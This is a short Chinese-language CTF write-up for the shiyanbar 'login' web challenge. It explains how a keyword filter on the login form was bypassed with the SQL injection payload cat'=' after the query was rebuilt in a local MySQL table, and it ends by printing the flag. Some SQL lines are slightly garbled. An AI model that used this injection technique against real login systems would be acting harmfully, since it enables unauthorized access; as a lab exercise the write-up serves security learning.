实验吧CTF---Web篇
1. 打开登录地址(http://ctf5.shiyanbar.com/web/wonderkun/web/index.html),发现为一个登录界面,第一想到的是查看源代码,没有发现其他信息,然后输入万能密码1‘or‘1‘=‘1,发现过滤了or ,但未过滤单引号(‘)等,如下图:
经过一些列测试,发现不但过滤了or,并且过滤了/ # -- select | union等。
猜测原SQL语句可能为:
select * form user where username = ‘ ‘ and password = ‘ ‘
在Mysql上创建user表模拟该登录表的信息:
create database test; ??//创建test数据库use test; ???create table user(username varchar(8), password varchar(32)); ?//创建user表insert into user(username, password) values(‘test‘,‘123456‘); ?//插入数据select * from user where name = ‘cat‘=‘‘ and passwd = ‘cat‘=‘‘; ?可成功执行
如下图所示,可成功执行并返回数据库信息:
组合后代码为:select * from user where name = ‘cat‘=‘‘ and passwd = ‘cat‘=‘‘;即payload: ??cat‘=‘/cat‘=‘
可成功登录并获取flag: ctf{51d1bf8fb65a8c2406513ee8f52283e7}
【实验吧】CTF_Web_登录一下好吗?
原文地址:http://www.cnblogs.com/caizhiren/p/7768936.html